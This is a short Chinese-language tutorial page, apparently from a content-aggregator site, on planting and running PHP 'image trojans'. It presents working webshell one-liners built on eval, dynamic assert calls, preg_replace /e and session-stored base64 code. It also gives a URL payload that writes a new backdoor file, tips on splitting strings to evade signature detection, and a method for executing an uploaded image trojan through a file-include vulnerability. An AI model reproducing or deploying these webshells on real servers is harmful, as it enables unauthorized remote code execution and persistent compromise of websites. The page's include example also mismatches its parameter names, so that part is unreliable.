php图片木马怎么运行
php图片木马怎么运行
内容导读
收集整理的这篇技术教程文章主要介绍了php图片木马怎么运行,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含1333字,纯文字阅读大概需要2分钟。
内容图文
PHP图片木马的的运行方法
1、标准的写法,直接通过eval执行php代码
@eval ($_POST['code']);
2、动态执行assert生成一个木马文件(隐藏性最好的一种)
@$_GET['a']($_GET['code']);
3、使用方法:从url中传入下面参数执行后会在当前目录生成一个c.php的文件
/index.php?a=assert&code=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};a参数为eval时会报错(因为eval不是函数)木马生成失败,为assert时同样报错,但会生成木马。
4、使用preg_replace执行代码(里面前面只要用一个的任意字符串就可以,如果不一样的话命令可能会被执行多次)
@preg_replace("/re/e", $_POST['code'], "re");5、把特征码打散
session_start();$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);$_SESSION['theCode']&&preg_replace(''a'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION['theCode']))','a');6、重命名任意文件
$reg="c"."o"."p"."y";$reg($_FILES['filename']['tmp_name'],$_FILES['filename']['name']);
include的漏洞使用方法
有时候我们会上传一些图片木马但是却不能执行,这个时候如果有一个include的漏洞,那么图片木马就可以执行啦。
如果php代码里有一个include($_GET['controller']) 且还有一个url路径为:/index.php?controller=user,这个看起来就是一个根据参数包含执行对应控制器的代码,但是如果url路径里的参数改成这样:/index.php?uid=/upload/images/muma.jpg,这个时候木马就执行啦。
以上内容仅供参考!
推荐教程:PHP视频教程
以上就是php图片木马怎么运行的详细内容,更多请关注Gxl网其它相关文章!
内容总结
以上是为您收集整理的php图片木马怎么运行全部内容,希望文章能够帮你解决php图片木马怎么运行所遇到的程序开发问题。 如果觉得技术教程内容还不错,欢迎将网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
